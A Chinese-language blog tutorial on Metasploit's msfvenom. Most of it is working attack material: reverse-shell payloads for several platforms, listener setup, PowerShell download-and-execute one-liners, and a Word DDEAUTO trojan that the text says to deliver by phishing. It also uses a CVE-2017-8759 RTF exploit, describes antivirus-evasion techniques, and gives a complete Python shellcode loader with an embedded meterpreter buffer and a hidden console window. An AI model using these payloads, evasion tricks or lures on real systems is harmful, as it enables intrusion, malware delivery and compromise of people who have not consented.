Loading

Metasploit msfvenom

一、 msfvenom简介

  msfvenommsf payloadmsf encode的结合体,于201568日取代了msf payloadmsf encode。在此之后,metasploit-framework下面的msf payload(载荷生成器),msf encoder(编码器),msfcli(监听接口)都不在支持。

二、msf venom参数

-p,  -payload <payload>指定需要使用的payload(攻击载荷)。也可以使用自定义的payload,几乎是支持全平台的
-l, -list [module_type] 列出指定模块的所有可用资源。模块类型包括:payloads,encoders,nops,all
-n,-nopsled <length>为payload预先指定一个NOP滑动长度
-f, -format <format>指定输出格式(使用--help-formats来获取msf支持的输出格式列表)
-e, -encoder[encoder]指定需要使用的encoder(编码器),如果即没有-e选择也没用-b选项,则输出raw payload-a, -arch <architecture> 指定payload的目标架构,例如x86|x64|x86_64-plaform <platform>指定payload的目标平台
-s, -space <length>设定有效攻击荷载的最大长度,就是文件大小
-b, -bad-chars <list>设定规避字符集,指定需要过滤的坏字符例如:不使用'x0f''\x00';-i, -iterations <count>指定payload的编码次数
-c, -add-code <path> 指定一个自定义的可执行文件为模板,并将payload嵌入其中
-k, -keep保护模板程序的动作,注入的payload作为一个新的进程运行
-payload-options列举payload的标准选项
-o, -out <path> 指定创建好的payload的存放位置
-v, -var-name <name>指定一个自定义的变量,以确定输出格式
-shellest 最小化生成payload
-h, -help查看帮助选项
-help-formats查看msf支持的输出格式列表

查看所有payload

root@kali:~/桌面# msfvenom --list payloads

 查看所有编码器

root@kali:~/桌面# msfvenom --list encoders

# 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器

 查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用

root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp --list-options

三、监听参数

防止假session
在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。
msf exploit(multi/handler) > set ExitOnSession false   
//可以在接收到seesion后继续监听端口,保持侦听。
防止session意外退出
msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

四、handler后台持续监听

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST 192.168.8.124
set LPORT 1122
set ExitOnSession false
exploit -j -z


msf exploit(multi/handler) > exploit -j -z
使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
还有种比较快捷的建立监听的方式,在msf下直接执行:
msf5 > handler -H 192.168.244.128 -P 1122 -p windows/meterpreter/reverse_tcp

 

五、payload的可持续化

一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe 

生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。 在上面的生成payload参数中: (1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程。 (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下。

 把生成的shell.exe(此文件不免杀) 复制到windows 2003靶机中双击运行

 

 

六、各平台payload生成

6.1 Linux

(1)设置监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1123
lport => 1123
msf5 exploit(multi/handler) > run

(2)生成Linux payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1123 -f elf > shell.elf

 

(3)执行shell.elf

root@kali:~# ls -larth shell.elf 
-rw-r--r-- 1 root root 250 6月  13 20:47 shell.elf
root@kali:~# chmod +x shell.elf 
root@kali:~# ./shell.elf 

 (4) 查看sessions

6.2 Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f exe > shell.exe

6.3 Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

6.4 Android

msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f raw > shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 R > test.apk

七、生成脚本payload

7.1 powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

7.2 nc正向连接

msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

7.3 nc反向连接,监听

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

7.4 PHP

kali监听会话、把shell.php上传至目标网站访问就可以建立会话了

(1)建立监听

msf5 exploit(multi/handler) >  use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1124
lport => 1124
msf5 exploit(multi/handler) > run

(2)生成payload

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1124 -f raw > shell.php

(3)把shell.php上传至目标网站

 

 (4)浏览器访问shell.php

 

 (5)查看建立的session

7.5 ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

7.6 JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

7.7 WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

7.8 powershell配置msf无文件攻击

(1)生成ps脚本、把生成的脚本放到web站点下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1125 -f psh-reflection >x.ps1

(2)设置监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.244.128 
set lport 1125 run

(3)客户端运行

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1')

(4)查看会话

 7.9 powershell配置word伪装木马

监听、生成payload操作和7.8操作一致

(1)新建一个word文档——插入——文档部件——域

 

 

 

 

 

 

 

 

DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1') " 

 

 

 

(3)通过钓鱼、社工等方式让其他人打开此word文档

 

 

7.10 msf宏钓鱼

git clone https://github.com/bhdresh/CVE-2017-8759.git
cd CVE-2017-8759/
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.244.128/logo.txt
# 生成如下图所示的文件

 

 生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1133 -f exe > /root/shell.exe
python cve-2017-8759_toolkit.py -M exp -e http://192.168.244.128/shell.exe -l shell.exe

开启监听

msf5 >  use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1133
lport => 1133
msf5 exploit(multi/handler) > run

把Invoice.rtf 上传到Windows 7

 

 

 

 

 

 八、ngrok穿透内网

 http://www.ngrok.cc/

 

 

 

 

 

 

 

 

 

 

unzip linux_amd64.zip
cd linux_amd64
./sunny clientid xxxxid

 

 生成payload

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10929 -f exe > a.exe

开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 10929
lport => 10929
msf5 exploit(multi/handler) > run

 

 Windows 7执行木马

 

 查看session

 

 九、msf5-Evasion免杀模块

9.1 Defender免杀

msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > options
msf5 evasion(windows/windows_defender_exe) > set filename ev.exe
filename => ev.ext
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 evasion(windows/windows_defender_exe) > set lport 1177
lport => 1177
msf5 evasion(windows/windows_defender_exe) > run

 设置监听

handler -H 192.168.244.128 -P 1177 -p windows/meterpreter/reverse_tcp

 

 

 目前已经不免杀

 

 

 

9.2 捆绑免杀 

可以在此站检测木马  https://www.virustotal.com/gui/home/upload

生成payload 捆绑putty.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122  -x putty.exe  -f exe -o payload3.exe

捆绑编码免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe  -i 15 -f exe -o payload4.exe

多重编码免杀

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.244.128 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe

十、shellter免杀

shellcode代码注入工具

https://www.shellterproject.com/download/

vim /etc/apt/sources.list
#中科大源
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
apt-get update


apt-get install shellter

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

启动shellter

root@kali:~# shellter

 

 

 

 开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.244.128
lhost => 192.168.244.128
msf5 exploit(multi/handler) > set lport 1155
lport => 1155
msf5 exploit(multi/handler) > run

把putty.exe复制到window7中运行(运行最新版本的360)

 

 查看建立的session

 用360动态杀毒时(不免杀)

 

十一、免杀python脚本

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1155 LHOST=192.168.244.128 -e x86/shikata_ga_nai -i 17 -f py -o  /root/121.py

 修改生成的py文件(头部和尾部添加、如下所示)

from ctypes import *
import ctypes
import sys, os, hashlib, time, base64

def rc4(string, op='encode', public_key='ddd', expirytime=0):
    ckey_lenth = 4
    public_key = public_key and public_key or ''
    key = hashlib.md5(public_key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or ''
    cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
    key_lenth = len(cryptkey)  # 64
    string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string
    string_lenth = len(string)
    result = ''
    box = list(range(256))
    randkey = []
    for i in xrange(255):
        randkey.append(ord(cryptkey[i % key_lenth]))
    for i in xrange(255):
        j = 0
        j = (j + box[i] + randkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    for i in xrange(string_lenth):
        a = j = 0
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    if op == 'decode':
        if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5(
                result[26:] + keyb).hexdigest()[0:16]:
            return result[26:]
        else:
            return None
    else:
        return keyc + base64.b64encode(result)


buf =  b""
buf += b"\xb8\x28\xce\x23\x6c\xdb\xca\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\xec\x31\x42\x14\x03\x42\x14\x83\xea\xfc\xca"
buf += b"\x3b\xf8\xa6\xb1\x1e\x60\x6e\x19\x47\xeb\xab\x55\x27"
buf += b"\x3d\x7d\x24\x3d\xbe\x92\xba\x8f\x9e\x7a\x41\xaf\x36"
buf += b"\x61\x6a\x0b\xa1\x03\xb3\x5f\xd3\x48\x35\x26\xa9\x11"
buf += b"\xa7\x32\x7d\x80\xe6\xd1\x66\x9a\x66\xc4\xce\x49\x58"
buf += b"\x57\x8b\x00\x8c\x91\xdf\xd7\xec\xe0\x5f\x72\x48\xc8"
buf += b"\xee\xaf\x99\x62\x57\xf0\x56\x40\x7e\xc2\xc2\x8e\x3b"
buf += b"\xbe\x0f\x7d\x5b\x82\xa3\xd8\x02\xcf\xf4\xf7\x15\x32"
buf += b"\xb8\xbc\x0a\x03\xb8\x34\x22\x2f\x21\x58\x83\x6b\x8f"
buf += b"\xa0\x32\xda\x92\x9a\x7a\x0b\xb8\x42\x82\x09\xe9\x32"
buf += b"\x94\x17\xcb\x5a\xea\x8e\xdb\xda\x9f\x86\x17\x6b\xc8"
buf += b"\x95\xf1\xbc\x1d\x1c\xbc\x57\x10\xad\x85\x4a\x35\x3f"
buf += b"\xf8\x01\xc0\xa4\x35\x5c\xd8\xb7\xf5\x2c\xfd\x2f\xd8"
buf += b"\x57\x21\xe3\x0d\x0c\x57\xa1\x0f\xcb\xfe\x18\x5a\x7f"
buf += b"\xa5\xa6\xc6\x2e\x61\xad\xc3\x4c\xb6\xa1\x03\x47\x83"
buf += b"\x03\xd2\x09\xff\x15\xd3\x38\x12\x40\x94\xdd\xae\x5a"
buf += b"\x32\x52\x6c\xa2\xa8\x18\xdd\xd9\x6b\x3e\x84\x15\x8f"
buf += b"\xe4\x85\x9e\x3d\xca\xee\xa7\xff\x44\x18\xf9\xcd\x80"
buf += b"\x9a\xc5\x0a\x25\xcc\xf1\xcd\x1f\xf6\xf4\x45\x16\xbc"
buf += b"\x8c\x96\xdc\x71\x9b\x35\xaf\xaf\xa0\xd3\x57\x0a\x2e"
buf += b"\xb1\x63\xa6\xfa\xa4\x11\xa1\x8d\x87\xc9\xeb\x0e\x85"
buf += b"\xa9\x6d\x9c\x4b\x60\xd0\xcb\xf6\x2b\xa9\xcf\x36\xef"
buf += b"\xa2\x5f\x98\xa1\x38\xfd\x86\x74\xab\xd2\x8b\x4b\xfd"
buf += b"\xd0\xd7\x7b\x64\x8b\x34\x3a\xad\x19\xce\xba\x88\x33"
buf += b"\x92\x59\xb4\xea\x80\x5a\x6f\x39\xbb\xe4\xa9\xba\xd4"
buf += b"\x3b\x74\xa0\xc0\x84\xc8\xb4\xf0\xcd\x2e\x30\x05\x96"
buf += b"\x87\xd3\x04\xf6\x69\x4b\xd0\x88\x00\x83\x4a\x3b\x1e"
buf += b"\x50\x68\x47\x9f\x12\x81\x84\x49\x18\x88\x78\x34\x28"
buf += b"\x13\x49\x37\xd0\xc2\x6f\x78\x88\xc5\x30\xbd\x92\x90"
buf += b"\x6d\x96\xa7\xbd\xec\xef\x91\x1c\x6b\xb5\xca\x24\x24"
buf += b"\x41\x2a\xce\x4f\x7f\x5e\x82\xc8\xbc\x8a\x1c\xd8\x0a"
buf += b"\xe3\xcf\xb6\x3e\x12\x72\x4e\x05\xd0\x40\x59\x82\x05"
buf += b"\x32\xbb\x1a\xe4\x0a\x62\x9a\xff\x89\xc6\xce\xaa\xeb"
buf += b"\x04\xae\x95\x65\x19\x3b\x79\x1e\xe7\xe7\x06\x8e\xa7"
buf += b"\xa2\x98\x6c\x6c\xb7\x01\x66\x13\x09\x60\x78\x39\x3f"
buf += b"\x49\x47\x7c\x55\xba\x57\xd2\x93\xb5\xcc\x6d\x23\xe2"
buf += b"\xd6\xcb\xd5\x13\x46\x60\x5b\xaf\x49\x7a\x00\xdc\x78"
buf += b"\x58\x6c\x46\x79\xd8\x3e\xdb\x3f\xd7\x3f\x08\xf2\x8b"
buf += b"\x2d\x22\x07\x03\x7d\x88\xfe\xc6\xef\xe4\x95\x4a\x56"
buf += b"\xa0\x81\xf5\x69\xca\x38\x00\x3f\xa0\x86\x9a\xca\xd8"
buf += b"\x5f\xe5\x38\x93\xb0\x1b\x81\x32\x15\xbc\xba\xc3\x9d"
buf += b"\xa7\x85\x9c\x5b\x93\x42\x63\xc2\xb6\x4b\x72\xb7\x7e"
buf += b"\xd8\xb9\x14\xe7\x5a\x34\x5a\xee\xa9\x8b\x3d\x13\x84"
buf += b"\x18\xf1\xb3\xda\x05\x27\x95\xb2\x7f\xda\x67\xf7\x68"
buf += b"\x47\x5c\x0a\xe6\x95\x0f\xbe\x39\xea\xe5\xf6\x09\x2a"
buf += b"\xe8\x0c\x93\xb0\xf3\x79\x03\xd5\x37\xf1\xcb\xae\x35"
buf += b"\x4c\xd9\x3a\xa7\x74\xf2\x49\xdb\x25\x30\x08\xc2\x26"
buf += b"\x72\x8b\x40\x30\xd9\x93\x5c\xee\xbd\xe1\xd1\x2d\x03"
buf += b"\x05\x16\x11\x74\x2d\xfe\x24\x84\x27\x0f\x8e\x0d\xd9"
buf += b"\x26\x63\x0c\x45\x86\xa3\x59\x9d\x3f\xbf\x53\x21\x67"
buf += b"\xbf\xad\x77\xb0\x38\xf2\x05\x6c\x51\xcd\xc7\xfd\x11"
buf += b"\xee\xd6\x07\x01\x82\xf5\x0c\xb9\xa8\x40\x0a\xb6\x17"
buf += b"\x41\xc9\xa1\x67\x5a\x7b\x21\x15\x3f\x5d\xe1\xe3\x61"
buf += b"\x22\xb5\xbb\xc9\x91\x8b\xd7\x62\x34\xf3\x56\x74\x15"
buf += b"\xae\xbf\xc3\xf3\x53\x0b\xb3\xef\xc1\x59\x95\x2b\x54"
buf += b"\x8c\x50\x90\xab\xc8\xa3\x1b\xaa\xda\xdd\xd6\x0e\xd6"
buf += b"\xbd\x6d\x7b\x76\x88\x04\x42\x50\xf0\x9a\xe1\x72\x79"
buf += b"\xdb\x8b\x3b\xb4\x6b\x8e\xd2\x58\xa4\x1b\x81\xad\x48"
buf += b"\x17\xaa\x9c\xe5\x1f\xc3\x10\xd8\x82\x42\x7a\xb0\x3b"
buf += b"\x29\xb7\xa9\xf1\xee\x40\x42\xcc\xa8\x8b\x84\xce\x7c"
buf += b"\xd7\x0d\x34\x08\xb6\xe5\xaf\x27\x84\x5c\x28\x15\xe1"
buf += b"\x46\x7c\xb0\xa8\x7a\xc3\x77\x12\x7a\xda\xb3\xc8\x5f"
buf += b"\x29\x08\x82\x05\xf9\xe4\xb3\xcd\xf6\x41\x5f\x55\x9b"
buf += b"\x9a\x5d\x6a\x69\x1b\x51\x0c\x77\xf5\xc1\x79\x1b\x1e"
buf += b"\xd8\xd3\x24\x41\xee\x4f\x1c\x5c\xef\x77\xf2\x68\x71"
buf += b"\x49\x51\xfc\x27\x5e\x55\x35\xdf\x4f\x9e\x8d\xe5\xf9"
buf += b"\x3e\x7d\xc7\x58\x99\xc0\xe2\xda\xe7\xad\x85\xf1\xb3"
buf += b"\x34\xc9\xc4\x48\x26\x4f\x9e\x66\xf1\xcb\x68\x82\xf7"
buf += b"\xe6\x96\x43\x9a\x0c\xe4\x0e\x36\x81\xde\x7d\xa9\x54"
buf += b"\xce\xa2\xf5\xfc\xcc\x89\x0d\x01\x5c\xf2\xbe\x99\xc2"
buf += b"\xe3\x68\x12\x3d\xb0\x76\xfe\xd6\x1c\xd1\x57\xa7\xa8"
buf += b"\xa2\xfc\x4a\x65\x75\xa2\xd1\xa4\xbe\xd9\x98\x03\x37"
buf += b"\xae\xaf\x82\x2a\x55\x57\xe9\x70\x9b\x3b\x07\x44\x6b"
buf += b"\x47\xb7\x42\x41\x10\x01\x25"



buf=rc4(buf,'encode','6666666666666')

# libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr:
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(rc4(buf, 'decode', '6666666666666'))
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    if 666 == 666:
        ctypes.windll.user32.ShowWindow(whnd, 0)
        ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                      ctypes.c_int(len(shellcode)),
                                                      ctypes.c_int(0x3000),
                                                      ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
121.py

安装pyinstaller 打包exe

pip install pywin32
pip install pyinstaller

打包exe并执行此exe文件

C:\Python27>pyinstaller -F 121.py

 

 

 

十二、venom秒杀payload

git clone https://github.com/r00t-3xp10it/venom
sudo ./setup.sh
sudo ./venom.sh

 

posted @ 2018-03-25 13:45  KubeSec  阅读(1193)  评论(0编辑  收藏  举报